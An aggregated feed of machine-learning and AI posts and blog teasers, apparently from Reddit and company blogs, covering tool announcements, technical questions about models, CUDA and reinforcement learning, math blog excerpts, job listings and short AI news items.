    I wanted to ask the AI experts for any tattoo ideas, anything like a symbol or word, something unique that represents AI. I was thinking of a CPU, but that's a bit meh and not really a symbol. Let me know :) submitted by /u/Equivalent-You5810 [link] [comments]  ( 8 min )
    My fellow innovators, I've created something truly revolutionary, born from the depths of my own frustrations
    As a web developer, I was constantly tired of switching between tabs just to translate a word or two, or to get a quick answer to a burning question from AI. The constant back-and-forth was draining my time and energy. So, I took matters into my own hands and developed a Chrome extension that allows you to get an answer from AI without ever leaving the comfort of your current tab, and specifically - the comfort of your current text field. It may seem like a simple solution, but trust me - it's a game-changer when trying to save time and energy. Assuming that there's a chance some of you might be experiencing the same frustration, I'd like to share this tool with you. For anyone thinking: "Wait, but there are already tools that let you use AI inside the current browser tab" - yeah, there are. BUT can they scrape website data from a simple URL in order to get context for the response? Can other tools read PDFs? Do these tools let you control every setting to the smallest detail? Probably not. Well this tool does let you do all that. You can find it on Chrome store as "Wou AI" Let me know how it works out for you, and I would greatly appreciate any feedback or suggestions for future functions. submitted by /u/MantasDigital [link] [comments]  ( 9 min )
    What can Socrates teach us about AI and prompting?
    submitted by /u/simsirisic [link] [comments]  ( 8 min )
    Review my AI Self Portraits Book!
    I'm looking for reviewers for my book, "AI Self Portraits", which is coming out on Amazon on the 21st. I might even put your quote on the back cover! https://preview.redd.it/cqmp1ggllhfb1.png?width=1024&format=png&auto=webp&s=cc7c087f7c2be103b53f2014acd991c947e6cb7f submitted by /u/KarneyHatch [link] [comments]  ( 8 min )
    TFJS Format vs. TFLite
    After analyzing 15,000 samples in the dataset, we noticed that increasing the number of images doesn't significantly improve the scoreboard recognition quality for our neural network. However, what's more interesting is how the network performs in different formats. When deployed in TFJS format on a website, it often behaves strangely, detecting objects where there are none. On the other hand, in TFLite format, such failures are almost non-existent. https://preview.redd.it/fedfa8lzchfb1.jpg?width=700&format=pjpg&auto=webp&s=850526791a75465e267afbed6ac1bc119b9ae6ae If you access the link on your mobile phone and grant camera permission, you'll witness the neural network (in TFJS format) attempting to find objects even when there are none. ​ submitted by /u/moseich [link] [comments]  ( 8 min )
    AI for YouTube Video Transcripts
    I was wondering if there is AI software smart enough to give an excellent-quality transcript if I give it the link to a YouTube video. The main feature I am looking for is the ability to identify the narrator and speakers by name (not Speaker 1, Speaker 2, etc.). Would really appreciate your help, as my own search has led me to a dead end. submitted by /u/Richie_Boy_ [link] [comments]  ( 8 min )
    How are people getting A.I. voices of Resident Evil Characters?
    How do channels like TriggerHappy Productions and WeskerandFriends get the A.I. voices of all these Resident Evil characters? submitted by /u/Conscious-Theory-850 [link] [comments]  ( 8 min )
    Exploring summarization options for Healthcare with Amazon SageMaker
    In today’s rapidly evolving healthcare landscape, doctors are faced with vast amounts of clinical data from various sources, such as caregiver notes, electronic health records, and imaging reports. This wealth of information, while essential for patient care, can also be overwhelming and time-consuming for medical professionals to sift through and analyze. Efficiently summarizing and extracting […]  ( 13 min )
    Unlocking creativity: How generative AI and Amazon SageMaker help businesses produce ad creatives for marketing campaigns with AWS
    Advertising agencies can use generative AI and text-to-image foundation models to create innovative ad creatives and content. In this post, we demonstrate how you can generate new images from existing base images using Amazon SageMaker, a fully managed service to build, train, and deploy ML models for at scale. With this solution, businesses large and […]  ( 8 min )
    Cuddly 3D Creature Comes to Life in Father-Son Collaboration This Week ‘In the NVIDIA Studio’
    Principal NVIDIA artist and 3D expert Michael Johnson creates highly detailed art that’s both technically impressive and emotionally resonant.  ( 6 min )
    NVIDIA Helps Forge Forum to Set OpenUSD Standard for 3D Worlds
    NVIDIA joined Pixar, Adobe, Apple and Autodesk today to found the Alliance for OpenUSD, a major leap toward unlocking the next era of 3D graphics, design and simulation. The group will standardize and extend OpenUSD, the open-source Universal Scene Description framework that’s the foundation of interoperable 3D applications and projects ranging from visual effects to Read article >  ( 6 min )
  • Open

    Confidence-Building Measures for Artificial Intelligence: Workshop proceedings
    No content preview  ( 2 min )

  • Open

    Up-down permutations
    An up-down permutation of an ordered set is a permutation such that as you move from left to right the permutation alternates up and down. For example 1, 5, 3, 4, 2 is an up-down permutation of 1, 2, 3, 4, 5 because 1 < 5 > 3 < 4 > 2. Up-down permutations are […] Up-down permutations first appeared on John D. Cook.  ( 5 min )
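    The alternating condition in the teaser is easy to check mechanically; a small sketch:

    ```python
    def is_up_down(p):
        """True if p alternates up, down, up, down... from left to right."""
        return all((p[i] < p[i + 1]) == (i % 2 == 0) for i in range(len(p) - 1))
    ```

    For instance, `is_up_down([1, 5, 3, 4, 2])` holds, while a monotone sequence like `[1, 2, 3]` fails at the second step.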
    Variance of binned data
    Suppose you have data that for some reason has been summarized into bins of width h. You don’t have the original data, only the number of counts in each bin. You can’t exactly find the sample mean or sample variance of the data because you don’t actually have the data. But what’s the best you […] Variance of binned data first appeared on John D. Cook.  ( 5 min )
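    A standard answer to the teaser's question (an assumption about where the post goes, not a summary of it): treat each observation as sitting at its bin midpoint, then subtract Sheppard's correction h²/12 from the resulting variance to undo the coarsening bias. A sketch:

    ```python
    def binned_mean_var(midpoints, counts, h):
        """Approximate mean and (Sheppard-corrected) variance from binned counts."""
        n = sum(counts)
        mean = sum(m * c for m, c in zip(midpoints, counts)) / n
        var = sum(c * (m - mean) ** 2 for m, c in zip(midpoints, counts)) / n
        return mean, var - h * h / 12  # Sheppard's correction for bin width h
    ```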
    Ancient estimate of π and modern numerical analysis
    A very crude way to estimate π would be to find the perimeter of squares inside and outside a unit circle. The outside square has sides of length 2, so 2π < 8. The inside square has sides of length 2/√2, so 8/√2 < 2π. This tells us π is between 2.82 and 4. Not […] Ancient estimate of π and modern numerical analysis first appeared on John D. Cook.  ( 6 min )
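    The two perimeter bounds in the teaser reduce to 2√2 < π < 4, which is easy to confirm:

    ```python
    import math

    outer = 8                    # circumscribed square: 4 sides of length 2
    inner = 8 / math.sqrt(2)     # inscribed square: 4 sides of length 2/sqrt(2)
    low, high = inner / 2, outer / 2   # bounds on pi from 2*pi bounds
    print(low, high)             # roughly 2.828 and 4.0
    ```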
  • Open

    LLM models for interpreting tables and charts [D]
    Hi all, Curious if anyone has recommendations on models to use to interpret the data in tables? I'm playing around with Google's Matcha model, which performs fine. It seems like extracting the data out of a table and asking GPT-4 to analyze it performs a bit better, but requires extra steps. I'm specifically not looking to interpret graphs, but rather tables. E.g., can I ask the model to identify errors in the table, or data points that don't tie out when the rows are supposed to sum up? submitted by /u/eyeronthrone [link] [comments]  ( 8 min )
    [N] Conference Codes
    I'll likely be downvoted to hell but here goes: Prices for The AI Conference double at midnight Pacific. 46 Speakers, 10+ topics, 2 Days plus a hackathon at night! Join us to learn and collaborate with scientists, engineers and founders from the top AI companies and projects. Speakers include:
    Ben Mann | Co-Founder | Anthropic
    Peter Norvig | Director of Research | Google
    Nazneen Rajani | Research Lead | Hugging Face
    Igor Markov | Research Scientist | Meta
    Bryan Catanzaro | VP of Research | Nvidia
    Ram Sriharsha | VP of Engineering and R&D | Pinecone
    Jerry Liu | Co-founder | LlamaIndex
    Harrison Chase | Co-founder | LangChain
    Alex Chao | Product Manager, Semantic Kernel | Microsoft
    See All Speakers. Last chance to get in on early bird pricing (save $400 on a 2-day pass). If you can read this and I'm not downvoted to hell, use discount code redditlove for 25% off. Use discount code "student" for $200 student tickets. *Must use EDU email to register* **This is my event and therefore self-promotion** submitted by /u/shonburton [link] [comments]  ( 9 min )
    [D] Where did all the ML research go?
    For the past several years this subreddit has been my favorite source to keep up with new, interesting ideas and research from all over the field. It's great to have a way to break out of my own insular research bubble and spread out a bit more. Unfortunately, it looks like that era has passed. The sub has been seemingly shifting away from research in the past 1-2 years. Whenever research is posted, it is almost always LLM-based, with very little variety (considering the plethora of research areas in ML). I don't mean to assert that this is a bad thing, as the constant upvotes indicate that there is a high demand for LLM projects and research. Heck, I'm also interested in lots of the recent work with LLMs, and I plan to keep up with it – but I would also love a venue with a diversity of ideas and topics. Machine learning is a HUGE field, and only focusing on a small subset of it seems like a waste. I don't mean to rant, but rather to ask: are there any other subreddits like this, or perhaps, any other active communities with a broader scope? Or if this doesn't exist, is there a demand for it? Or is it just me? submitted by /u/ejmejm1 [link] [comments]  ( 9 min )
    [D] elasticsearch HNSW python implementation
    Is there any documentation available that will help in implementing Elasticsearch HNSW ANN search in Python? I've searched a lot, but I can't find anything in the official documentation either. Any help will be appreciated. TIA submitted by /u/adiraat [link] [comments]  ( 8 min )
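    For what it's worth, Elasticsearch 8.x doesn't expose HNSW as a separate API: approximate kNN (with HNSW as the underlying graph structure for indexed `dense_vector` fields) goes through the `knn` option of the `_search` API. A minimal sketch with the official Python client (the index and field names here are made up for illustration):

    ```python
    # Request-body builders for Elasticsearch 8.x approximate kNN search.
    # HNSW is used automatically for dense_vector fields with "index": True.

    def knn_mapping(dims: int) -> dict:
        """Index mapping with an HNSW-indexed dense_vector field."""
        return {
            "mappings": {
                "properties": {
                    "embedding": {
                        "type": "dense_vector",
                        "dims": dims,
                        "index": True,           # enables ANN (HNSW) indexing
                        "similarity": "cosine",
                    }
                }
            }
        }

    def knn_query(vector: list, k: int = 10, num_candidates: int = 100) -> dict:
        """`knn` section of a _search request body."""
        return {
            "field": "embedding",
            "query_vector": vector,
            "k": k,
            "num_candidates": num_candidates,
        }

    # With a running cluster and `pip install elasticsearch`:
    # from elasticsearch import Elasticsearch
    # es = Elasticsearch("http://localhost:9200")
    # es.indices.create(index="docs", **knn_mapping(dims=384))
    # hits = es.search(index="docs", knn=knn_query([0.1] * 384))
    ```

    `num_candidates` trades recall for latency: it is how many candidates the HNSW graph search gathers per shard before the top `k` are returned.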
    Why CUDA 11.7? Can more recent versions of CUDA be used? Is this a PyTorch limitation? [D]
    Everyone always seems to use CUDA 11.7. Is there a reason for this? What is the factor that limits the CUDA version used? Are there any speed/efficiency advantages to using a more recent version of CUDA, such as CUDA 12.0? What exactly is the limiting factor here, PyTorch? I've looked in the PyTorch docs but I don't see where the CUDA version is defined. Where can I find the maximum CUDA version I can use with the latest (or any given) PyTorch version? Thanks! submitted by /u/Pan000 [link] [comments]  ( 8 min )
    [D] Model design for outputting reliable multiclass probabilities
    Hey guys, I am working on a horse racing model to identify the probabilities of each horse winning a race. I currently have a feed forward NN with a final SOFTMAX layer to simulate probabilities of each horse winning using cross-entropy loss. My plan here being that if the model outputs, [0.05, 0.4, 0.2, 0.15, 0.2] then horses 1-5 have the corresponding probability of winning. The model has been trained like a regular classification task where the target is a one-hot vector describing the winner. Unlike previous work I have done where SOFTMAX output lends itself to some "confidence" score, this task requires that the model outputs be indicative of probabilities. My concern is that experientially, NNs tend to be overconfident with their answers in this type of setting. However, I wish to keep using a NN as each race datapoint has around 3k features - did not find good results with XGBoost. Any good practices for modelling probabilities in this sort of scenario? For context, the probability of a horse winning is what sets the odds for that horse. submitted by /u/HStuart18 [link] [comments]  ( 9 min )
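    On the overconfidence concern: a cheap, standard post-hoc fix is temperature scaling. Fit a single scalar T on held-out races by minimizing the negative log-likelihood of the actual winners, then divide the logits by T at inference. A minimal sketch (pure Python, with a grid search standing in for gradient-based fitting):

    ```python
    import math

    def softmax(logits, T=1.0):
        """Temperature-scaled softmax; T > 1 softens, T < 1 sharpens."""
        m = max(logits)
        exps = [math.exp((z - m) / T) for z in logits]
        s = sum(exps)
        return [e / s for e in exps]

    def fit_temperature(race_logits, winners):
        """Grid-search T minimizing NLL of the actual winners on held-out races."""
        grid = [0.5 + 0.1 * i for i in range(46)]  # T in [0.5, 5.0]
        def nll(T):
            return -sum(math.log(softmax(z, T)[w])
                        for z, w in zip(race_logits, winners))
        return min(grid, key=nll)
    ```

    With the fitted T, the published win probabilities become `softmax(logits, T)` instead of the raw softmax; the argmax (and hence accuracy) is unchanged, only the calibration moves.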
    [D] Running Free Willy / stable baluga 2
    I was wondering if anyone knows how difficult it is to set up a server to run the 70B llama / llama 2 variants like these top ones on the hugging face leaderboard https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard What type of gpu would I need to set it up? Would the high ram t4 you get with Google colab+ be enough or does it require more power / space? Thanks in advance! submitted by /u/Additional_Elk4745 [link] [comments]  ( 8 min )
    [R] Attention over pre-trained Sentence Embeddings for Long Document Classification
    Article available here: https://arxiv.org/pdf/2307.09084.pdf Thoughts? submitted by /u/MuffinB0y [link] [comments]  ( 8 min )
    [P] Apple - Fruit = X? Combine Queries and Explore CLIP Embedding Space With rclip
    Hi. I've shipped an update to my rclip – a command-line photo search tool powered by CLIP. Now, you can add and subtract image and text queries from each other; here are a few usage examples:
    cd photos && rclip horse + stripes
    cd photos && rclip apple - fruit
    cd photos && rclip "./new york city.jpg" + night
    cd photos && rclip "2:golden retriever" + "./swimming pool.jpg"
    cd photos && rclip "./racing car.jpg" - "2:sports car" + "2:snow"
    If you want to see how these queries perform when executed on the 1.28-million-image ImageNet-1k dataset, check out the demo on YouTube: https://www.youtube.com/watch?v=MsTgYdOpgcQ. rclip source code is published on GitHub under the MIT license and offers a pre-built distributable for Linux (installation instructions are in the README): https://github.com/yurijmikhalevich/rclip. Give it a try and let me know what you think! submitted by /u/39dotyt [link] [comments]  ( 9 min )
    [D] Open Source Model Combination To Turn Images -> LLM?
    Im trying to research into open source text models [like Llama] and image models [like Stable Diffusion]. My goal is to give the model(s) a picture of birds and bees, then ask it to "circle" the bees. The idea is, when given an image, it would produce coordinates on that image where the line should be circled. It could also represent where it should "click" on all the bees. Does something like this exist? submitted by /u/MindWithEase [link] [comments]  ( 8 min )
    Open Problems and Fundamental Limitations of Reinforcement Learning from Human Feedback
    submitted by /u/Working_Ideal3808 [link] [comments]  ( 8 min )
    [P] Pair programming my website with an AI developer
    submitted by /u/williamsweep [link] [comments]  ( 8 min )
  • Open

    [Reinforcement Learning: an Introduction (2nd edition)] Why not the joint distribution for equations 3.5 and 3.6?
    Greetings! I'm going through the initial equations that define most of the theoretical framework for the specialization. One curious thing I noticed with equations 3.5 and 3.6 is that they use the conditional distribution p(s′,r∣s,a) without including any priors. I'm talking about priors because, unless I'm missing something huge, the definition of the expected value for the reward (for both 3.5 and 3.6) should use the joint distribution over all 4 dimensions (next state, reward, current state, action). From that joint distribution, we can factorize to recover p(s′,r∣s,a). For example, one factorization that seems to make sense for this kind of model is p(s′,r,s,a) = p(s′,r∣s,a) ⋅ p(s) ⋅ p(a), which would turn equation 3.5 into r(s,a) = ∑_{s′} ∑_r r ⋅ p(s′,r∣s,a) ⋅ p(s) ⋅ p(a). What am I missing? Is it because s and a are given as parameters of the function r(s,a), meaning that p(s) = p(a) = 1? If the factorization above is the right one for those equations, is this the only factorization used in the entire book? Thanks in advance! submitted by /u/SupBiebi [link] [comments]  ( 9 min )
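    For reference, equation 3.5 as printed in Sutton & Barto (2nd ed.) is defined as a conditional expectation given s and a, which is why no marginals over s and a appear:

    ```latex
    r(s,a) \doteq \mathbb{E}\left[R_t \mid S_{t-1}=s,\, A_{t-1}=a\right]
           = \sum_{r \in \mathcal{R}} r \sum_{s' \in \mathcal{S}} p(s', r \mid s, a)
    ```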
    [Discussion] Comprehensive learning resources that emphasize DEEP reinforcement learning?
    So I understand that there is the Sutton & Barto book on reinforcement learning in the sidebar. I was wondering what other resources you guys have used that you would recommend that emphasize deep reinforcement learning for someone with some experience in shallow/classical reinforcement learning already and some experience with deep learning already, but new to deep reinforcement learning submitted by /u/BornAgain20Fifteen [link] [comments]  ( 8 min )
    What are some big action space MARL stochastic games implemented in OpenSpiel or equivalent?
    Are there big action space stochastic games that are implemented in OpenSpiel or equivalent? I played around Markov soccer game a lot but it's solvable with tabular methods and I was looking for games with at least more than 500 actions both players can take as a testbed for more complicated action spaces? submitted by /u/Potential_Biscotti14 [link] [comments]  ( 8 min )
    Optimal Bidding Strategy in Power Market using Reinforcement Learning
    Hello everyone! I'm trying to use reinforcement learning to solve a problem in the power market. The problem is about finding the best strategy for bidding on electricity for each hour of the day, considering both buying and selling options. Let's say we have a generator that can produce up to 800MW of electricity per day, and it can be charged up to 200MW per hour. After charging it for 4 hours continuously, it reaches its maximum capacity, and we can't charge more until we discharge some electricity. We have access to data from the past 5 years, including information about temperature, hydro, gas prices, and locational marginal price, which is important for determining profit. For instance, if we buy 10MW of electricity for a specific hour, our profit for that hour is 10 times the locational marginal price. The goal is to maximize profit at the end of the day while making sure that the total electricity bought and sold is equal for all days. This means we want to avoid wasting electricity. I initially tried using deep Q-learning, where the agent's state consists of data from the past 3 days, and the agent can take actions to buy or sell a certain amount of electricity for one hour. However, this approach doesn't seem to provide accurate results, and it works step by step, not considering the overall outcome for the whole day. So, I'm looking for help on how to build an agent capable of producing 24 bids for 24 hours, considering the constraints of the generator's capacity and ensuring no waste of electricity. I'm new to reinforcement learning, and I'm not sure how to approach this complex problem. Any guidance would be greatly appreciated! submitted by /u/uonliaquat [link] [comments]  ( 9 min )
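    One structural fix for the "step by step, not the whole day" issue described above: make a single action the full 24-hour bid vector, so the reward is the whole day's profit and the energy-balance constraint becomes a terminal penalty. A toy environment sketch (all names, numbers, and the penalty form are illustrative assumptions, not real market logic):

    ```python
    # One episode = one day; the action is a 24-entry schedule of MW bids.
    class DayAheadBiddingEnv:
        MAX_RATE = 200.0      # MW charged/discharged per hour
        CAPACITY = 800.0      # MWh storage capacity

        def __init__(self, prices):  # prices: 24 locational marginal prices
            assert len(prices) == 24
            self.prices = prices

        def step(self, schedule):
            """schedule: 24 floats, + = buy/charge, - = sell/discharge."""
            level, profit = 0.0, 0.0
            for mw, price in zip(schedule, self.prices):
                mw = max(-self.MAX_RATE, min(self.MAX_RATE, mw))   # rate limit
                mw = max(-level, min(self.CAPACITY - level, mw))   # capacity limit
                level += mw
                profit += -mw * price    # buying costs money, selling earns
            penalty = abs(level)         # end the day balanced, no waste
            return profit - penalty
    ```

    Because the whole schedule is one action, the agent is scored on the day's outcome rather than hour by hour, which matches the stated objective.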
    Looking for old tutorial series
    A few years ago, I remember reading a multipart series of articles/blog posts explaining how to develop agents for classical games. I believe the series started with tic-tac-toe and definitely progressed to gomoku, before maybe moving on to more complex games. I think there was more of a focus on algorithms (maybe MCTS) and concepts than code. It's a long shot, but does anyone recall this series or know if it's archived somewhere? seems like it might have been taken down. Wasn't on Medium. I think it might've been a personal website. I vaguely remember a green UI theme? submitted by /u/nothymn [link] [comments]  ( 8 min )
  • Open

    Is image generation or text generation more impactful?
    Curious what people's stance on this is. Why? View Poll submitted by /u/philippemnoel [link] [comments]  ( 8 min )
    State of AI security.
    submitted by /u/Philipp [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/31/2023
    Deutsche Telekom, e&, SK Telecom (SKT), and Singtel penned an agreement to form a global telecoms AI alliance designed to use the technology to unlock new business opportunities and accelerate industry growth.[1] Influencers Lil Miquela, Imma, and supermodel Shudu have raked in millions from deals with fashion giants such as Dior, Calvin Klein, Chanel, and Prada. But these shiny celebrities all have one thing in common — not one of them is real.[2] Google’s chatbot Bard reveals the jobs most at risk of artificial intelligence with truck drivers and data entry clerks on the list – while teachers and lawyers are among the safest careers.[3] DoorDash Inc., the US food-delivery service that competes with Uber Technologies Inc. and GrubHub, is looking to speed up ordering and help customers find food options with an artificial intelligence-based chatbot.[4] Sources: [1] https://www.mobileworldlive.com/featured-content/home-banner/global-operator-giants-launch-ai-alliance/ [2] https://www.the-sun.com/tech/8725778/ai-influencers-fashion-deals/ [3] https://www.dailymail.co.uk/news/article-12354605/googles-AI-bard-predicts-jobs-risk.html [4] https://www.bloomberg.com/news/articles/2023-07-27/doordash-is-working-on-an-ai-chatbot-to-speed-up-food-ordering?in_source=embedded-checkout-banner submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
  • Open

    Build protein folding workflows to accelerate drug discovery on Amazon SageMaker
    Drug development is a complex and long process that involves screening thousands of drug candidates and using computational or experimental methods to evaluate leads. According to McKinsey, a single drug can take 10 years and cost an average of $2.6 billion to go through disease target identification, drug screening, drug-target validation, and eventual commercial launch. […]  ( 15 min )
    Is your model good? A deep dive into Amazon SageMaker Canvas advanced metrics
    If you are a business analyst, understanding customer behavior is probably one of the most important things you care about. Understanding the reasons and mechanisms behind customer purchase decisions can facilitate revenue growth. However, the loss of customers (commonly referred to as customer churn) always poses a risk. Gaining insights into why customers leave can […]  ( 14 min )
  • Open

    Doctor AI: Healing humans and mother earth hand in hand
    Let’s imagine – with algorithms and a nerdy charm that could melt any data center – an ‘AI’ wearing lab coats and stethoscopes patrolling hospital hallways, tirelessly monitoring patients. The digital doctor will take the pulse of Mother Earth, reduce waste, and cut energy consumption! The artificial intelligence community is well aware… Read More »Doctor AI: Healing humans and mother earth hand in hand The post Doctor AI: Healing humans and mother earth hand in hand appeared first on Data Science Central.  ( 20 min )
    Increase efficiency of manufacturing operations with IoT solutions
    In an age where efficiency is king, manufacturing firms are in a constant race to outshine their competition. Imagine if you could boost productivity, slash downtime, and cut costs all at once. Sounds like a dream, right? The good news is, this isn’t a fantasy. It’s achievable through Internet of Things (IoT) solutions. IoT solutions… Read More »Increase efficiency of manufacturing operations with IoT solutions The post Increase efficiency of manufacturing operations with IoT solutions appeared first on Data Science Central.  ( 21 min )
    Human-centered data networking with interpersonal knowledge  graphs
    “If you start by creating your data, then it’s like you are piling up some value or you’re creating some assets,” WordLift CEO Andrea Volpini told me in our recent FAIR Data Forecast interview. Volpini’s an advocate for adding structured data such as Schema.org to your content. That way, the content becomes logically connected and… Read More »Human-centered data networking with interpersonal knowledge  graphs The post Human-centered data networking with interpersonal knowledge  graphs appeared first on Data Science Central.  ( 21 min )
  • Open

    Interview with Hikaru Shindo and Quentin Delfosse: Neurosymbolic Reinfor...
    submitted by /u/Neurosymbolic [link] [comments]  ( 8 min )
  • Open

    Using AI to protect against AI image manipulation
    “PhotoGuard,” developed by MIT CSAIL researchers, prevents unauthorized image manipulation, safeguarding authenticity in the era of advanced generative models.  ( 10 min )

  • Open

    [R] Towards robust production machine learning for software systems - Survey
    Could you please help us get more responses for this study? As part of my PhD research project at Applied Artificial Intelligence Institute of Deakin University, we are investigating the challenges that software engineers face when working with machine learning (ML) models in production. Moreover, we explore how to enhance our proposed solution to better meet the needs of these engineers. The objective of this study is to pinpoint the areas where software engineers need more support and resources to effectively work with ML components in production. It also aims to evaluate the effectiveness of a proposed protocol to improve software engineers' productivity and enable them to work more effectively with ML components in production environments. With the knowledge gained from this i…  ( 9 min )
    [D] Number of epochs for a BERT based model
    Hello everyone. I am trying to replace the GloVe-embeddings-based model outlined in this paper with BERT embeddings. The authors of the paper have trained their model for 250 epochs, which for what I am doing is not feasible. I was wondering what the recommended number of epochs to run the BERT model for would be? I know it is a pretty open-ended question, but I was looking to get the community's view on how many epochs a BERT-based model should be trained for. Any information will be much appreciated. submitted by /u/nocturnal_1_1995 [link] [comments]  ( 9 min )
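    For context, the original BERT paper recommends only 2-4 fine-tuning epochs; a common recipe is a small cap plus early stopping on validation loss rather than a fixed count. A framework-agnostic sketch (the `run_epoch` callback is a hypothetical stand-in for one epoch of training plus evaluation):

    ```python
    def train_with_early_stopping(run_epoch, max_epochs=10, patience=2):
        """run_epoch(epoch) -> validation loss; stop after `patience`
        consecutive epochs without improvement."""
        best, bad, stopped_at = float("inf"), 0, max_epochs
        for epoch in range(max_epochs):
            loss = run_epoch(epoch)
            if loss < best:
                best, bad = loss, 0
            else:
                bad += 1
                if bad >= patience:
                    stopped_at = epoch + 1
                    break
        return best, stopped_at
    ```

    This sidesteps guessing the epoch count: set `max_epochs` generously and let the validation curve decide.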
    [N] AI Usage Fees Up to 15x Cheaper for English Than Other Languages
    submitted by /u/geekinchief [link] [comments]  ( 8 min )
    [D] Alternatives to HF or a path forward for the OSS community?
    I think it’s clear that Hugging Face is not aligned to the OSS community any more and it’s only going to get worse over the next few years. What are the top alternatives or where should the OSS contributors go? I’m trying to think ahead to what libraries we should rely on and contribute to. Anyone else have this as a worry? https://twitter.com/untitled01ipynb/status/1685667451197878272 submitted by /u/homunculAI [link] [comments]  ( 8 min )
    [R] Compressing vision-language and unimodal Transformers via structured pruning
    🚀 Code: https://github.com/sdc17/UPop 📑 Paper: https://proceedings.mlr.press/v202/shi23e/shi23e.pdf 🧐 A Quick Look What is it: UPop is the first structured pruning framework for vision-language Transformers. It enables effective structured pruning on various multi-modal & uni-modal tasks (including Visual Reasoning, Image Captioning, Visual Question Answer, Image-Text Retrieval, Text-Image Retrieval, Image Classification and Image Segmentation), datasets (including NLVR2, COCO Caption, VQAv2, COCO, Flickr30K, ImageNet and ADE20K), and model architectures (including BLIP, CLIP, DeiT and Segmenter). https://preview.redd.it/gfbjnxjm95fb1.png?width=2145&format=png&auto=webp&s=108898690f66a1f0afa068b69487859213055928 What challenge does it tackle: The above figure demonstrates that Unified Search adopted by UPop rescues us from the burden of repeated experiments (e.g., doing grid search) for searching optimal compression ratios among different modalities and structures. Furthermore, Progressive Pruning adopted by UPop eliminates the weight gap between the searched model and the pruned subnet to be retrained, therefore gaining better convergence and performance, especially at high compression ratios. How about the performance: On multimodal tasks, for example, UPop can achieve 2x compression with only 1.2% and 2.0% accuracy loss on the VQAv2 dataset for Visual Question Answer and the NLVR2 dataset for Visual Reasoning, respectively. On unimodal tasks, for example, UPop can achieve 1.5x and 1.2x compression without any loss of accuracy on the ImageNet dataset for Image Classification and the ADE20K dataset for Image Segmentation, respectively. Some examples of vector-level structured granularity are as follows. https://preview.redd.it/lifz1n1ia5fb1.png?width=1187&format=png&auto=webp&s=f419d9c5fb4d80a2a564198eba356021e1c275e4 submitted by /u/Salty-Situation2606 [link] [comments]  ( 9 min )
    [P] [HIRING] High Paying ML Jobs
    Title | Company | Location | URL
    Senior Software Engineer (Backend) | Nova Credit | Remote | https://pycareer.io/jobs/6816
    Data Scientist - Delivery, Senior-Staff | Instacart | Not Specified | https://pycareer.io/jobs/6773
    Data Scientist | United States | https://pycareer.io/jobs/6780
    Senior Data Scientist (NLP and Classification Expert) | Not Specified | https://pycareer.io/jobs/6781
    Senior Software Engineer (Backend) | United States | https://pycareer.io/jobs/6788
    AWS Data Engineer | Not Specified | United States | https://pycareer.io/jobs/6801
    Senior Data Engineer Manager | Not Specified | United States | https://pycareer.io/jobs/6802
    Data Scientist – Delivery, Senior-Staff | Instacart | Remote | https://pycareer.io/jobs/6805
    Software Design Engineer – NET, Python – Citizen/GC (H) | Not Specified | Remote | https://pycareer.io/jobs/6837
    Senior Data Scientist | Getty Images | Remote | https://pycareer.io/jobs/6839
    Lead Data Scientist | General Mills | Remote | https://pycareer.io/jobs/6840
    Data Scientist – Delivery, Senior-Staff | Instacart | Remote | https://pycareer.io/jobs/6842
    submitted by /u/tadasg6 [link] [comments]  ( 9 min )
    [P] PromptTools: Open source tools for language model evaluation
    submitted by /u/hegel-ai [link] [comments]  ( 8 min )
    [R] If you have to do a ML project for prediction macroeconomic factors which factor would you choose
    For a master thesis I want to write a ML model (and hopefully make my own contribution) and I plan to use macroeconomic data. I could predict the typical inflation, GDP, unemployment, but are there any other factors that are important. Could you give me some ideas. Thanks! submitted by /u/AnyJello605 [link] [comments]  ( 8 min )
    [D] Can artificial intelligence solve the problem of crop diseases — and help curb global hunger?
    submitted by /u/Muinonan [link] [comments]  ( 8 min )
    [D] Interesting real-world applications for fine-tuning T5, and similar models?
    Everyone is going crazy creating LORAs and fine-tuning huge LLMs, however I've seen many suggesting that models such as T5 from Google has its place in the enterprise. Have you guys used this or similarly small models for any novel real world problems? Please do share! submitted by /u/MonkeyMaster64 [link] [comments]  ( 8 min )
    [D] Simple Questions Thread
    Please post your questions here instead of creating a new thread. Encourage others who create new posts for questions to post here instead! Thread will stay alive until next one so keep posting after the date in the title. Thanks to everyone for answering questions in the previous thread! submitted by /u/AutoModerator [link] [comments]  ( 8 min )
    [P] Deep Dive and Experiments for the NN + Gzip Method vs LLMs
    submitted by /u/seraschka [link] [comments]  ( 8 min )
    [R] NEnv: Neural Environment Maps for Global Illumination
    submitted by /u/crp1994 [link] [comments]  ( 8 min )
    [D] How to generate masks for overlapping classes to COCO format labels, to be used in transformer models like Segformer.
    Hi, I am new to computer vision. I am working on a particular hackathon challenge where the input labels are in COCO format. I am using the following code to generate masks:
    cat_ids = coco.getCatIds()
    anns_ids = coco.getAnnIds(imgIds=img['id'], catIds=cat_ids, iscrowd=None)
    anns = coco.loadAnns(anns_ids)
    anns_img = np.zeros((img['height'], img['width']))
    for ann in anns:
        anns_img = np.maximum(anns_img, coco.annToMask(ann) * ann['category_id'])
    But the image has overlapping labels for some pixels, and this masking will only assign one label to such a pixel, resulting in information loss. Is there any way to prevent this and preserve the information? submitted by /u/franticpizzaeater [link] [comments]  ( 9 min )
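    One common workaround (a sketch, not the only option): keep a separate binary mask per category, a multi-hot stack, instead of collapsing everything into a single label map, so overlapping annotations at a pixel are all preserved. A pure-Python illustration, where `ann_masks` stands in for the binary arrays `coco.annToMask(ann)` would return:

    ```python
    def multi_hot_masks(ann_masks, category_ids, num_classes, height, width):
        """Stack of per-class binary masks, shape (num_classes, height, width).

        Overlapping annotations with different category ids each keep their
        own channel, so no label is lost at shared pixels.
        """
        out = [[[0] * width for _ in range(height)] for _ in range(num_classes)]
        for mask, cat in zip(ann_masks, category_ids):
            for y in range(height):
                for x in range(width):
                    if mask[y][x]:
                        out[cat][y][x] = 1
        return out
    ```

    A model like SegFormer can then be trained with a per-channel binary (sigmoid) loss instead of a single softmax over mutually exclusive classes.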
    [Discussion] what should I do?
    Hi, y’all. So, I completed my master's degree. Got a programming job. I’m amazed at the capabilities of machine learning and want to build my own models. I don’t really want to go and get another degree, but I want to learn how to build models. I’m particularly interested in forecasting because my job deals with NASA and wind data. I’m wondering if we could predict 6-hour wind data with a balloon sounding. I know C++ and Python. How do I stay relevant in the changing technology space and learn how to build some cool stuff that may be useful? Thanks for any advice. submitted by /u/corey4005 [link] [comments]  ( 9 min )
    [D] Calculate 'w' and 'b' in hard margin SVM
